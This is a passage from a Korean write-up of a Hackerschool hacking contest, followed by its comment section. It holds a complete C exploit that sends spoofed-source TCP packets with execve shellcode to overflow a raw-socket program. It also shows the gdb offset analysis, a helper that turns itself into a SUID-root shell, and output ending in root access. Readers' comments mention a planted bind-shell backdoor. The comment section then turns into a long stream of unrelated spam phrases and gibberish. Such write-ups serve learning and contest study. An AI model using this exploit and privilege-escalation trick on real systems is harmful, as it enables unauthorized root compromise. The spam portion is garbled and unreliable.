프로세스로서 버퍼오버플로우로 인해 Segmentation fault를 내고 죽은 것이다.

vuln은 송신지 IP가 123.234.123.234이고 목적지 포트가 777로 설정된 패킷을

받으면 그 내용을 화면에 출력한다.

-------------------------------------------------------------------------------

[QUESTION]# cd /home/guru3/QUESTION/

[QUESTION]# ./vuln

This is correct IP address

I received attacker's packet.

0xbffff8f8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

0xbffff908 41 41 41 41 31 c0 50 68 2f 2f 53 48 68 2f 74 6d AAAA1.Ph//SHh/tm

0xbffff918 70 89 e3 50 53 89 e1 99 b0 0b cd 80 08 f9 ff bf p..PS...........

This is correct IP address

I received attacker's packet.

0xbffff8f8 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

0xbffff908 41 41 41 41 31 c0 50 68 2f 2f 53 48 68 2f 74 6d AAAA1.Ph//SHh/tm

0xbffff918 70 89 e3 50 53 89 e1 99 b0 0b cd 80 08 f9 ff bf p..PS...........

-------------------------------------------------------------------------------

9.2 공격 과정

다음은 guru 서버에서 raw 소켓이 열려있는 것을 확인한 것이다.

------------------------------------------------------------------------------

[guru3@guru QUESTION]$ netstat -wnap

(Not all processes could be identified, non-owned process info

will not be shown, you would have to be root to see it all.)

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

raw 0 0 0.0.0.0:6 0.0.0.0:* 7 -

[guru3@guru QUESTION]$

------------------------------------------------------------------------------

다음은 loafer 컴퓨터에서 raw 소켓이 열려있는 것을 확인한 것이다.

------------------------------------------------------------------------------

[root@loafers]# nmap -sO guru.hackerschool.org -p 6

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )

Interesting protocols on (218.149.4.32):

Protocol State Name

6 open tcp

Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

------------------------------------------------------------------------------

/home/guru3/QUESTION/vuln를 gdb로 역어셈블하여 vuln의 코드를 분석하고

리턴주소와 buffer 위치 사이의 간격을 계산하였다.

o vuln 프로그램에서 buffer의 위치와 main()의 리턴주소 위치 사이의 간격 계산

----------------------------------------------------------------------------

[guru3@loafers QUESTION]$ gdb /home/guru3/QUESTION/vuln

(gdb) disassemble main

0x080487c9 <main+247>: call 0x80483f4 <printf>

0x080487ce <main+252>: add $0x10,%esp

0x080487d1 <main+255>: sub $0x8,%esp

0x080487d4 <main+258>: pushl 0xffffff40(%ebp)

0x080487da <main+264>: lea 0xffffffd8(%ebp),%eax --> &buffer = %ebp - 40

0x080487dd <main+267>: push %eax

0x080487de <main+268>: call 0x8048414 <strcpy>

---Type <return> to continue, or q <return> to quit---q

Quit

(gdb)

* 리턴주소와 buffer 위치 사이의 간격 = (%ebp + 4) - (%ebp - 40) = 44

----------------------------------------------------------------------------

다음 공격코드는 목표 호스트에 tcp 패킷을 보내주는 프로그램이다.

목표 호스트의 방화벽이 SYN tcp 패킷을 차단한다면 ACK 패킷을 보내볼 수도 있다.

공격이 성공한 경우 /home/guru3/vuln이 버퍼오버플로우를 일으켜 /tmp/SH를

실행하도록 쉘코드을 작성했다.

이 프로그램은 raw socket을 이용하므로 root 권한으로 실행해야한다.

o 공격코드

------------------------------------------------------------------------------

/* guru3-exp.c */

#include <signal.h>

#include <stdio.h>

#include <netdb.h>

#include <sys/types.h>

#include <sys/time.h>

#include <netinet/in.h>

#include <linux/ip.h>

#include <linux/tcp.h>

#define SYN 1

#define ACK 2

#define FIN 4

#define RST 8

unsigned long getaddr(char *name)

{

struct hostent *hep;

hep = gethostbyname(name);

if (!hep) {

fprintf(stderr, "Unknown host %s\n", name);

exit(1);

}

return *(unsigned long *) hep->h_addr;

}

/* Check Sum */

unsigned short ip_sum(u_short *addr, int len)

{

u_short answer = 0;

while (nleft > 1) {

sum += *w++;

nleft -= 2;

}

if (nleft == 1) {

*(u_char *) (&answer) = *(u_char *) w;

sum += answer;

}

sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */

sum += (sum >> 16); /* add carry */

answer = ~sum; /* truncate to 16 bits */

return (answer);

}

void send_tcp_segment(int sock, unsigned long my_ip, unsigned long my_port,

unsigned long their_ip, unsigned short their_port,

int tcp_flag, char *data, int dlen)

{

struct tcphdr th;

memset(&th, 0, sizeof th);

th.source = htons(my_port);

th.dest = htons(their_port);

th.seq = htonl(314159265);

th.doff = sizeof(th) / 4;

th.ack_seq = 0;

th.res1 = 0;

th.fin = ((FIN & tcp_flag) != 0); // default 0

th.syn = ((SYN & tcp_flag) != 0); // default 1

th.rst = ((RST & tcp_flag) != 0); // default 0

th.psh = 0;

th.ack = ((ACK & tcp_flag) != 0); // default 0

th.urg = 0;

/* th.res2=0; */

th.window = htons(65535);

th.check = 0;

th.urg_ptr = 0;

struct { /* rfc 793 tcp pseudo-header */

unsigned long saddr, daddr;

char mbz;

char ptcl;

unsigned short tcpl;

} ph;

ph.saddr = my_ip;

ph.daddr = their_ip;

ph.mbz = 0;

ph.ptcl = IPPROTO_TCP;

ph.tcpl = htons(sizeof(th) + dlen);

char buf[65536];

memcpy(buf, &ph, sizeof(ph));

memcpy(buf + sizeof(ph), &th, sizeof(th));

memcpy(buf + sizeof(ph) + sizeof(th), data, dlen);

memset(buf + sizeof(ph) + sizeof(th) + dlen, 0, 4);

th.check = ip_sum((u_short*)buf, (sizeof(ph) + sizeof(th) + dlen + 1) & ~1);

struct iphdr ih;

memset(&ih, 0, sizeof ih);

ih.version = 4;

ih.ihl = 5;

ih.tos = 0; /* XXX is this normal? */

ih.tot_len = sizeof(ih) + sizeof(th);

ih.id = htons(random());

ih.frag_off = 0;

ih.ttl = 30;

ih.protocol = IPPROTO_TCP;

ih.check = 0;

ih.saddr = my_ip;

ih.daddr = their_ip;

memcpy(buf, &ih, 4 * ih.ihl);

memcpy(buf + 4 * ih.ihl, &th, sizeof(th));

memcpy(buf + 4 * ih.ihl + sizeof(th), data, dlen);

memset(buf + 4 * ih.ihl + sizeof(th) + dlen, 0, 4);

ih.check = ip_sum((u_short*)buf, (4 * ih.ihl + sizeof(th) + dlen + 1) & ~1);

memcpy(buf, &ih, 4 * ih.ihl);

struct sockaddr_in sin;

sin.sin_family = AF_INET;

sin.sin_port = th.dest;

sin.sin_addr.s_addr = ih.daddr;

if (sendto(sock, buf, 4 * ih.ihl + sizeof(th) + dlen, 0, &sin, sizeof(sin)) < 0) {

printf("Error sending syn packet.\n");

perror("");

exit(1);

}

char shellcode[] =

"\x31\xc0" // xor %eax, %eax

"\x50" // push %eax

"\x68" "//SH" // pushl $"//SH"

"\x68" "/tmp" // pushl $"/tmp"

"\x89\xe3" // mov %esp, %ebx

"\x50" // push %eax

"\x53" // push %ebx

"\x89\xe1" // mov %esp, %ecx

"\x99" // cdq

"\xb0\x0b" // mov $0xb, %al

"\xcd\x80"; // int $0x80

int main(int argc, char *argv[])

{

if (argc <= 1) {

printf("usage: %s [options] hostname\n"

" -S SYN flag on\n"

" -F FIN flag on\n"

" -A ACK flag on\n"

" -R RST flag on\n"

" -l eggloc expected eggcode location: low\n"

" -h egghigh expected eggcode location: high\n"

" -p port victim's port number\n"

" -s ip my faked ip\n"

" hostname victim's hostname\n\n", argv[0]);

exit(0);

}

unsigned long my_ip = getaddr("123.234.123.234");

char *them;

int tcp_flag = 0;

unsigned int eggloc = 0xbffff058;

unsigned int eggend = eggloc;

int their_port = 777;

int opt;

while ((opt = getopt(argc, argv, "SAFRl:h:s:p:")) != -1) {

extern char *optarg;

switch (opt) {

case 'S':

tcp_flag |= SYN;

break;

case 'A':

tcp_flag |= ACK;

break;

case 'F':

tcp_flag |= FIN;

break;

case 'R':

tcp_flag |= RST;

break;

case 'l':

eggloc = strtoll(optarg, 0, 0);

break;

case 'h':

eggend = strtoll(optarg, 0, 0);

break;

case 's':

my_ip = getaddr(optarg);

break;

case 'p':

their_port = strtoll(optarg, 0, 0);

break;

}

extern int optind;

them = (optind < argc) ? argv[optind] : "localhost";

unsigned long their_ip = getaddr(them);

srandom(time(0));

int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if (sock < 0) {

perror("socket (raw)");

exit(1);

}

for (; eggloc <= eggend; eggloc++) {

// printf("eggloc = %p\n", eggloc);

// buf = nop * [44 - strlen(shellcode)] + shellcode + retaddr;

char buf[1024];

int buflen = 48;

memset(buf, 'A', buflen);

strcpy(buf + 44 - strlen(shellcode), shellcode);

*(int *) &buf[44] = eggloc;

send_tcp_segment(sock, my_ip, 31415, their_ip, their_port, tcp_flag, buf, buflen);

}

return 0;

}

----------------------------------------------------------------------------------------

o 공격 실험

대회서버에 대한 공격은 조작된 발신지 IP(IP spoofing)를 갖는 패킷을 차단하는

학교 라우터 덕분에 성공하지 못했다. root 패스워드를 알고 있는 학교 밖 리눅스

서버가 있다는 것을 당시엔 왜 생각나질 않았을까? ㅜ.ㅠ

다음 내용은 loafers가 구성한 실험환경에서 시행한 것을 바탕으로 구성하였다.

- 단계 1

대회서버에 접속한 후 공격이 성공하면 실행될 /tmp/SH 프로그램을 설치한다.

/tmp/SH는 매개변수 없이 실행하면 자신의 소유자 root로 바꾸고 자신에 SUID 비트를

설정하고, 매개변수가 있으면 /bin/sh을 실행하는 프로그램이다.

[guru3@guru guru3]$ cat /tmp/mkshell.c

int main (int argc, char *argv[])

{

if (argc > 1) {

setreuid (0, 0);

setregid (0, 0);

system ("/bin/sh");

} else {

chown (argv[0], 0, 0);

chmod (argv[0], 06777);

}

[guru3@guru guru3]$ gcc -o /tmp/SH /tmp/mkshell.c

[guru3@guru guru3]$ ls -l /tmp/SH

-rwxr-xr-x 1 guru3 guru3 12062 7월 2 19:02 /tmp/SH

- 단계 2

공격자의 리눅스에서 root 권한으로 공격 프로그램을 실행한다.

[root@loafers]# id

uid=0(root) gid=0(root)

groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

[root@loafers]# gcc -o guru3-exp guru3-exp.c

[root@loafers]# ./guru3-exp

usage: ./guru3-exp [options] hostname

-S SYN flag on

-F FIN flag on

-A ACK flag on

-R RST flag on

-l eggloc expected eggcode location: low

-h egghigh expected eggcode location: high

-p port victim's port number

-s ip my faked ip

hostname victim's hostname

[root@loafers]# ./guru3-exp guru.hackerschool.org -S -l 0xbffff000 -h 0xbfffffff

다음과 같이 대회서버쪽 방화벽이 SYN 패킷을 차단한다면,

[root@guru]# iptables -L

Chain INPUT (policy ACCEPT)

target prot opt source destination

REJECT tcp -- anywhere anywhere tcp flags:SYN,RST,ACK/SYN reject-with icmp-port-unreachable

대회서버쪽에 ACK 패킷을 만들어 보내도록 한다.

[root@loafers]# ./guru3-exp guru.hackerschool.org -A -l 0xbffff000 -h 0xbfffffff

- 단계 3

공격이 성공하면 /tmp/SH는 root SUID 프로그램으로 바뀐다.

/tmp/SH을 실행하면 root 권한의 쉘을 얻게된다.

[guru3@guru guru3]$ ls -l /tmp/SH

-rwsrwsrwx 1 root root 12062 7월 2 19:02 /tmp/SH

[guru3@guru guru3]$ /tmp/SH go

sh-2.05b# id

uid=0(root) gid=0(root) groups=507(guru3)

sh-2.05b#

------------------------------------------------------------------------------

==============================================================================

10 대회 후기

비록 포인트를 전혀 얻지 못했지만 대회에 참여하여 문제를 풀어보는 것만으로도

즐거웠습니다. 특히 마지막 소켓 프로그래밍 문제를 풀면서 공부도 많이하게 되어

성과도 큽니다.

이렇게 재미있고 흥미넘치는 대회를 준비해주신 해커스쿨에 감사드립니다.

이번 대회에서도 제게 백도어를 선물해주신 분께도 고맙습니다. 속으로는

밉기도하지만... 한가지 우려스러운 것이 있는데 사람들에게 loafers가 백도어

훔치기 전문 도둑으로 알려질까 두려운 것입니다. ^^

** 입상자에게 한마디!! **

w0rm9 : 역시 천재교수 유교수님 답습니다. (__) .
secuboy : exploit도 유행을 따라가나봅니다. egg가 사라질날이 머지 않은듯합니다. .
secuboy : 좋은문서 감사하고요... 많이 배우겠습니다. 꾸벅 .
낭만쟁이 : 축하드립니다. ^^ .
김봉남어린이 : loafers님 보고서는 저같은 초보들에게도 언제나 좋은 지침서가 됩니다 T^T 멋져요~ .
DarkSlayer : 1위부터 5위까지.. 저에게는 언제나 동아전과가 됩니다 -_-;;; 추카추카 -.-;; .
grinroad : 잘 보았어요. 아주 논리정연하군요..많은 도움되었습니다. .
blksaint : 아무리 봐도 대단하시네요.. 추카해용.. .
세벌쉭 : 축하드립니다.^.^ .
y2family : 앗.. 9876 바인드 열어놓고 닫는다는걸 깜빡 -_-; 나중에 생각나서 닫으려고 보니까 이미 닫혀 있더군요 .
loafers : 9876포트 바인드쉘 wiseguys팀이 선물하신거였더군요. 무지 고마웠어요~ ^^ .
.. : 9..9876 백도어.. 이건 좀 안습이네요;; 나머지는 잘 봤습니다. ㅎ .
Mark : 4CTusi http://www.y7YwKx7Pm6OnyJvolbcwrWdoEnRF29pb.com .
Arnold : Do you know the address? .
Murray : Which team do you support? .
Benny : I'm originally from Dublin but now live in Edinburgh .
Isidro : I'd like to send this parcel to .
Israel : Get a job .
Austin : Could you give me some smaller notes? .
Gaylord : Not in at the moment .
Cyrus : How many would you like? .
Linwood : I'm on holiday .
Destiny : Very funny pictures .
Merrill : I have my own business .
Dwight : I have my own business .
Maximo : Go travelling .
Trenton : Thanks for calling .
Rusty : We went to university together .
Richard : I stay at home and look after the children .
Sierra : History .
Micheal : Cool site goodluck :) .
Donovan : Until August .
Myron : What's the exchange rate for euros? .
Emerson : I can't get through at the moment .
Mary : Until August .
Cletus : How much is a Second Class stamp? .
Bruce : Directory enquiries .
Wallace : A few months .
Stacy : Looking for a job .
Corey : I'd like to speak to someone about a mortgage .
Sophie : Whereabouts are you from? .
Berry : Do you know the address? .
Elijah : Whereabouts are you from? .
Leonard : Could you please repeat that? .
Desmond : I'll call back later .
Carlos : Could you send me an application form? .
Elisha : I'm self-employed .
Sydney : A few months .
Jozef : Accountant supermarket manager .
Rosario : Sorry, I ran out of credit .
Katelyn : A packet of envelopes .
Savannah : I'd like to open a business account .
Linwood : Could you please repeat that? .
Howard : real beauty page .
Duane : I can't get a signal .
Cedrick : Could you ask him to call me? .
Darell : I'd like to pay this cheque in, please .
Alden : Yes, I play the guitar .
Harvey : I quite like cooking .
Bailey : This is your employment contract .
Taylor : Could I have , please? .
Kristopher : Is it convenient to talk at the moment? .
Johnny : Very funny pictures .
Arnulfo : A law firm .
Daron : Not available at the moment .
Mervin : Wonderfull great site .
Steep777 : Could you tell me my balance, please? .
Vincent : I'm on business .
Diego : Insufficient funds .
Arlen : I'm on a course at the moment .
Grant : Gloomy tales .
Delmar : What do you like doing in your spare time? .
Dogkill : I'll put her on .
Leroy : A book of First Class stamps .
Aidan : Very funny pictures .
Thanh : I work here .
Alvaro : Where are you calling from? .
Lanny : What's the exchange rate for euros? .
Vaughn : A Second Class stamp .
Ramon : I'll send you a text .
Darwin : Very interesting tale .
Allan : Free medical insurance .
Clair : I live here .
Connor : I can't get a signal .
Morton : I sing in a choir .
Edmund : Will I have to work shifts? .
Alfred : I'd like to open an account .
Winford : Where do you come from? .
Abigail : Very Good Site .
Courtney : Yes, I play the guitar .
Bryant : Can I call you back? .
Luke : I'm training to be an engineer .
Matthew : I came here to study .
Barrett : I hate shopping .
Milton : Can you put it on the scales, please? .
Jarvis : How much does the job pay? .
Dexter : Will I have to work on Saturdays? .
Haley : Could I have an application form? .
Pedro : How much does the job pay? .
Sammy : I'm interested in .
Autumn : A Second Class stamp .
Chadwick : Could I have , please? .
Isabella : A staff restaurant .
Reynaldo : Looking for a job .
Angel : Insufficient funds .
Barton : I'm about to run out of credit .
Elwood : Are you a student? .
Wally : Are you a student? .
Walton : I have my own business .
Sherman : Will I have to work on Saturdays? .
William : A company car .
Morton : I'd like to send this to .
Horace : Can I call you back? .
August : Get a job .
Melvin : This is your employment contract .
Lavern : I'm on a course at the moment .
Walton : I sing in a choir .
Michel : An accountancy practice .
Elisha : Directory enquiries .
Myron : this post is fantastic .
Numbers : I really like swimming .
Kylie : Where do you study? .
Jerrell : Wonderfull great site .
Bernard : Your cash is being counted .
Ellsworth : I don't like pubs .
Leonard : real beauty page .
Kurtis : Excellent work, Nice Design .
Freeman : I'm in a band .
Wayne : Very funny pictures .
Ramiro : Not available at the moment .
Federico : Could I make an appointment to see ? .
Morgan : What do you do? .
Jackie : I don't like pubs .
Palmer : A financial advisor .
Nathanial : I'm in a band .
Carrol : I'm originally from Dublin but now live in Edinburgh .
Marlon : How much is a First Class stamp? .
Sanford : I'm a housewife .
William : How do you do? .
Buford : I'm happy very good site .
Jackson : I want to report a .
Cedrick : Which year are you in? .
Booker : The United States .
Antonia : I'm doing an internship .
Delmer : Would you like to leave a message? .
Levi : I've been made redundant .
Winford : How would you like the money? .
Jeramy : Sorry, you must have the wrong number .
Cornelius : I'm a housewife .
Kidrock : Can I call you back? .
Kenny : What do you do? .
Silas : What do you want to do when you've finished? .
Hyman : Could I have an application form? .
Augustus : How much notice do you have to give? .
Manual : Gloomy tales .
Alden : Very interesting tale .
Reinaldo : What's the current interest rate for personal loans? .
Payton : Could I have an application form? .
Felton : I'm on holiday .
Terrence : I really like swimming .
Audrey : Will I get paid for overtime? .
Emerson : Do you know each other? .
Craig : An estate agents .
Loren : I came here to study .
Grant : I can't get a signal .
Laurence : Sorry, I'm busy at the moment .
Dallas : What sort of work do you do? .
Randal : How do you know each other? .
Hilario : Children with disabilities .
Ahmed : i'm fine good work .
Ernie : Where are you calling from? .
Ernie : Your account's overdrawn .
Chance : Your cash is being counted .
Blake : Where did you go to university? .
Mario : I'm training to be an engineer .
Louie : I'm not sure .
Sammie : What's the current interest rate for personal loans? .
Rusty : Whereabouts are you from? .
Willy : Stolen credit card .
Dillon : Nice to meet you .
Jorge : I'm not sure .
Lillian : History .
Woodrow : I'd like to change some money .
Chloe : magic story very thanks .
Sidney : When do you want me to start? .
Dghonson : I wanted to live abroad .
Derrick : I'm self-employed .
Granville : Do you know the address? .
Reginald : I sing in a choir .
Modesto : A staff restaurant .
Billie : I'm on a course at the moment .
Aiden : I read a lot .
Jack : Yes, I love it! .
Francis : Could I have a statement, please? .
Bella : I enjoy travelling .
Megan : Enter your PIN .
Greenwood : A book of First Class stamps .
Donnell : I'm happy very good site .
Columbus : How much is a Second Class stamp? .
Randal : I've just started at .
Cooper : I support Manchester United .
Mitchell : Another service? .
Stephanie : this post is fantastic .
Alonso : What do you want to do when you've finished? .
Ahmed : I'm a housewife .
Cedrick : How many more years do you have to go? .
Coolman : I came here to work .
Marlon : Do you know the number for ? .
Willis : On another call .
Ernest : I'd like some euros .
Darrin : Could you transfer $1000 from my current account to my depos .
Rhett : We need someone with qualifications .
Sherwood : I do some voluntary work .
Gianna : Do you like it here? .
Hunter : What qualifications have you got? .
Marlon : Insufficient funds .
Rubin : A few months .
Jerome : What sort of work do you do? .
Angel : I'd like to open a personal account .
Katherine : Will I have to work shifts? .
Sandy : I've been made redundant .
Trevor : I can't stand football .
Sergio : I work here .
Garry : What sort of music do you listen to? .
Magic : Do you know the number for ? .
Keith : I'd like to change some money .
Frankie : I can't get a dialling tone .
Keven : Not in at the moment .
Elden : What sort of work do you do? .
Darrell : This is the job description .
Steep777 : Your account's overdrawn .
Kerry : On another call .
Dewayne : Canada>Canada .
William : Where do you live? .
Isiah : I've lost my bank card .
Rebecca : Get a job .
Jefferey : I can't get a signal .
Jeremiah : Jonny was here .
Ava : A packet of envelopes .
Peter : It's serious .
Ernie : I've come to collect a parcel .
Reggie : I work for a publishers .
Fidel : I'm a member of a gym .
Connor : this is be cool 8) .
Connor : How much will it cost to send this letter to ? .
Federico : I can't get a signal .
Arron : Pleased to meet you .
Ariana : A law firm .
Addison : Please call back later .
Gustavo : I'd like to open a personal account .
Antony : I'm in a band .
Stephen : Will I be paid weekly or monthly? .
Denis : Recorded Delivery .
Luis : Do you know the number for ? .
Brandon : I like it a lot .
Joseph : Very funny pictures .
Trent : We were at school together .
Brice : this is be cool 8) .
Markus : I'd like to send this to .
Steven : A company car .
Kimberly : What university do you go to? .
Normand : Which team do you support? .
Liam : Remove card .
Miles : Have you got any qualifications? .
Walker : The United States .
Erich : I'd like to cancel this standing order .
Royce : I wanted to live abroad .
Rocky : How much is a Second Class stamp? .
Oscar : Can you hear me OK? .
Buddy : I didn't go to university .
Benny : I'm sorry, he's .
Rodolfo : What qualifications have you got? .
Sammy : In tens, please (ten pound notes) .
Herschel : This is your employment contract .
Jamie : I'd like to pay this cheque in, please .
Andre : It's a bad line .
Marquis : I'm from England .
Weldon : I'm a partner in .
Gaylord : I've been made redundant .
Danielle : I'm interested in this position .
Isabelle : Could I make an appointment to see ? .
Desmond : Will I have to work on Saturdays? .
Rufus : I'd like to open a business account .
Johnathan : I stay at home and look after the children .
Robert : How do you know each other? .
Shawn : Whereabouts in are you from? .
Vaughn : What's the last date I can post this to to arrive in time f .
Jimmi : Free medical insurance .
Toney : Which team do you support? .
Romeo : I've been made redundant .
Nevaeh : I'd like to open an account .
Dwain : Will I get paid for overtime? .
Pierre : I stay at home and look after the children .
Irwin : Who do you work for? .
Daron : How much will it cost to send this letter to ? .
Darwin : Recorded Delivery .
Marion : I came here to study .
Danial : A staff restaurant .
Sierra : I don't know what I want to do after university .
Ambrose : One moment, please .
Irwin : I'm not interested in football .
Luther : How much notice do you have to give? .
Zoey : Three years .
Claire : this post is fantastic .
Lillian : perfect design thanks .
Cristopher : I came here to work .
Agustin : What company are you calling from? .
Tomas : I'm not sure .
Rufus : I like watching TV .
Kenton : Enter your PIN .
Renato : US dollars .
Kelvin : I want to report a .
Mariano : I support Manchester United .
Lightsoul : this is be cool 8) .
Bobby : Have you read any good books lately? .
Lyndon : I'm sorry, he's .
Timmy : I've been cut off .
Nogood87 : I'd like to open an account .
Kasey : I'll send you a text .
Teodoro : I wanted to live abroad .
Dennis : Which year are you in? .
Arthur : Could I have a statement, please? .
Brooke : What's the interest rate on this account? .
Mauro : Where do you study? .
Miguel : Just over two years .
Wayne : Where did you go to university? .
Earle : I'd like to send this to .
Edison : I don't like pubs .
Willard : Free medical insurance .
Brice : I'd like to send this letter by .
Luke : I work for a publishers .
Ervin : A few months .
Caden : I work with computers .
Andrew : I'd like to open a business account .
Rolland : I've lost my bank card .
Elvin : Could I ask who's calling? .
Monty : What do you like doing in your spare time? .
Luther : An envelope .
Anna : We need someone with experience .
Numbers : I've lost my bank card .
Dwight : I can't get through at the moment .
Sylvester : I'm retired .
Ferdinand : Just over two years .
Cameron : Could you tell me the number for ? .
Delbert : Sorry, I ran out of credit .
Shayne : Sorry, you must have the wrong number .
Nicolas : Do you like it here? .
Elijah : I've only just arrived .
Randell : A packet of envelopes .
Mervin : I'm sorry, he's .
Vaughn : I don't know what I want to do after university .
Merlin : I've just started at .
Buster : We'll need to take up references .
Isabella : Go travelling .
Keenan : Who's calling? .
Curt : An estate agents .
Emile : A company car .
Claude : I'm unemployed .
Wiley : Could I have a statement, please? .
Daniel : It's OK .
Benton : I'll text you later .
Darryl : I live here .
Kelley : I'd like to change some money .
Napoleon : What sort of music do you listen to? .
Diva : Could you give me some smaller notes? .
Garth : I'd like to tell you about a change of address .
Hannah : Where's the nearest cash machine? .
Aubrey : Insufficient funds .
Josiah : I've got a full-time job .
Lester : How do you do? .
Barney : I work for a publishers .
Jeffery : Will I have to work on Saturdays? .
Harvey : A book of First Class stamps .
Avery : A financial advisor .
Terrell : Where's the postbox? .
Cornelius : Could I borrow your phone, please? .
Sydney : Would you like to leave a message? .
Mia : Could you tell me the number for ? .
Ivory : A packet of envelopes .
Emanuel : I'll send you a text .
Osvaldo : What's the current interest rate for personal loans? .
Vince : Can I use your phone? .
Owen : I'm sorry, I didn't catch your name .
Franklin : Could I make an appointment to see ? .
Fabian : Could I take your name and number, please? .
Bryant : I never went to university .
Mathew : this post is fantastic .
Jeffery : A book of First Class stamps .
Bryon : I'm not working at the moment .
Julio : Insufficient funds .
Markus : Do you like it here? .
Judson : Recorded Delivery .
Cameron : We need someone with experience .
Rudolph : I'm happy very good site .
Melissa : This is the job description .
Amia : Three years .
Carrol : Is this a temporary or permanent position? .
Raymundo : Remove card .
Kraig : I came here to work .
Aaron : Canada>Canada .
Fabian : I'm afraid that number's ex-directory .
Thanh : It's serious .
Lioncool : Will I be paid weekly or monthly? .
Carson : I need to charge up my phone .
Faith : I'm only getting an answering machine .
Adolph : Have you got any experience? .
Marcel : How do I get an outside line? .
Raleigh : I'd like to send this parcel to .
Rodney : We need someone with qualifications .
Samuel : I'm in a band .
Barbera : Where do you live? .
Dannie : I like it a lot .
Santo : Just over two years .
Peyton : I've been cut off .
Nolan : We used to work together .
Royal : I'd like to send this letter by .
Alejandro : No, I'm not particularly sporty .
Alyssa : Why did you come to ? .
Stuart : I'm doing an internship .
Buster : Excellent work, Nice Design .
Marcelo : I've got a very weak signal .
Kendrick : I'm on a course at the moment .
Stanford : How many are there in a book? .
Hector : My battery's about to run out .
Cody : Punk not dead .
Morris : It's OK .
Isiah : I'm originally from Dublin but now live in Edinburgh .
Gilbert : Which year are you in? .
Sheldon : About a year .
Arron : What do you do? .
Stephan : I love this site .
Charlie : We went to university together .
Maya : Would you like to leave a message? .
Frederic : Could you tell me the number for ? .
Sierra : I do some voluntary work .
Ashley : Stolen credit card .
Andreas : Could I make an appointment to see ? .
Lanny : What university do you go to? .
Donny : I'd like to withdraw $100, please .
Myron : I'll put him on .
Nathaniel : Who do you work for? .
Cecil : Where do you live? .
Elwood : How many more years do you have to go? .
Benjamin : Could I make an appointment to see ? .
Brody : I enjoy travelling .
Cooler111 : Could you ask her to call me? .
Ariana : Other amount .
Palmer : History .
Leigh : I'm retired .
Jeffery : I've lost my bank card .
Howard : A book of First Class stamps .
Madison : This is your employment contract .
Mikel : A jiffy bag .
Jonah : How many would you like? .
Roscoe : Looking for a job .
Kaylee : Another service? .
Jack : Yes, I play the guitar .
Jesse : What part of do you come from? .
Carlo : One moment, please .
Nicky : Languages .
Keenan : I'm a member of a gym .
Ellsworth : The line's engaged .
Raleigh : I'd like to change some money .
Luke : I'm interested in .
Zachery : Not available at the moment .
Crazyfrog : An estate agents .
Rueben : Could you give me some smaller notes? .
Michel : Best Site good looking .
Christian : When can you start? .
Daron : Hold the line, please .
William : How many days will it take for the cheque to clear? .
Riley : I can't hear you very well .
Eduardo : I stay at home and look after the children .
Kurtis : I'm not interested in football .
Sean : Where are you from? .
Stuart : What sort of music do you listen to? .
Kennith : I'd like to speak to someone about a mortgage .
Jayson : I was born in Australia but grew up in England .
Thebest : I'm from England .
Denis : Whereabouts in are you from? .
Sydney : On another call .
Luke : Nice to meet you .
Eldridge : We'd like to offer you the job .
Amia : I didn't go to university .
Kennith : How much were you paid in your last job? .
Cooper : Hold the line, please .
Carey : Why did you come to ? .
Johnny : An estate agents .
Federico : Have you got a telephone directory? .
Patrick : Punk not dead .
Darrin : Whereabouts in are you from? .
Jacob : Remove card .
Damion : Could I have an application form? .
Dexter : I was born in Australia but grew up in England .
Mariano : Why did you come to ? .
Marvin : I'm happy very good site .
Charlotte : Who do you work for? .
Thurman : We'd like to invite you for an interview .
Terrell : I've been made redundant .
Aaliyah : Your account's overdrawn .
Ivory : I like watching TV .
vsuadnnxoj : cGU4eR wfdqgkkcpchg, .
Keven : I'd like to open a business account .
Ariel : I can't get through at the moment .
Brendon : I'll put her on .
Jacob : I was born in Australia but grew up in England .
Milton : I'd like to tell you about a change of address .
Jimmy : I'd like a phonecard, please .
Tommie : Insert your card .
Winfred : Looking for work .
Tomas : A jiffy bag .
Carmelo : I'm in a band .
Ollie : I really like swimming .
Lucien : Do you know each other? .
Gerardo : Nice to meet you .
Lightsoul : When can you start? .
Ignacio : On another call .
Guadalupe : How many weeks' holiday a year are there? .
Connor : I live here .
Brooks : I read a lot .
Infest : I'd like to speak to someone about a mortgage .
Pierre : Where do you live? .
Nelson : It's serious .
Bryan : Languages .
Mauricio : What do you like doing in your spare time? .
Cyril : I was born in Australia but grew up in England .
Ariel : Could you tell me the number for ? .
Hassan : I've come to collect a parcel .
Archie : I'd like , please .
Rikky : An envelope .
Wilford : Could I take your name and number, please? .
Steven : I'd like some euros .
Kristopher : How much is a First Class stamp? .
Morton : How many more years do you have to go? .
Alonzo : Could I have a statement, please? .
Nickolas : I want to make a withdrawal .
Ayden : I quite like cooking .
Gilbert : I'm interested in this position .
Reginald : I'd like to take the job .
Bella : Could I make an appointment to see ? .
Brooklyn : I'm only getting an answering machine .
Madison : Could I take your name and number, please? .
Bobber : What do you want to do when you've finished? .
Elias : Could you please repeat that? .
Edward : Who's calling? .
Donald : Could you please repeat that? .
Anderson : A pension scheme .
Bryan : Could you transfer $1000 from my current account to my depos .
Marcos : this is be cool 8) .
Armando : Three years .
Bertram : We used to work together .
Jeffery : Could I order a new chequebook, please? .
Noah : I'm not interested in football .
German : I'm only getting an answering machine .
Maxwell : Stolen credit card .
Harry : Do you know each other? .
Timmy : We'd like to offer you the job .
Donny : Yes, I play the guitar .
Chuck : very best job .
Rolando : How much is a Second Class stamp? .
Kelly : I'm interested in .
Curt : I didn't go to university .
Hailey : How long have you lived here? .
Rigoberto : Your cash is being counted .
Cornelius : Pleased to meet you .
Horacio : I love this site .
Lowell : In a meeting .
Hosea : Could you tell me the number for ? .
Abdul : I've just started at .
Russel : A few months .
Lucien : A financial advisor .
Dogkill : I'm a trainee .
Norberto : I'd like , please .
Warren : Your account's overdrawn .
Jonas : Insufficient funds .
Jason : How do you spell that? .
Kristofer : How do you know each other? .
Bella : Have you seen any good films recently? .
Isaac : Enter your PIN .
Emile : Do you know each other? .
Wilfred : Will I get travelling expenses? .
Booker : How many days will it take for the cheque to clear? .
Monte : I was made redundant two months ago .
Horacio : very best job .
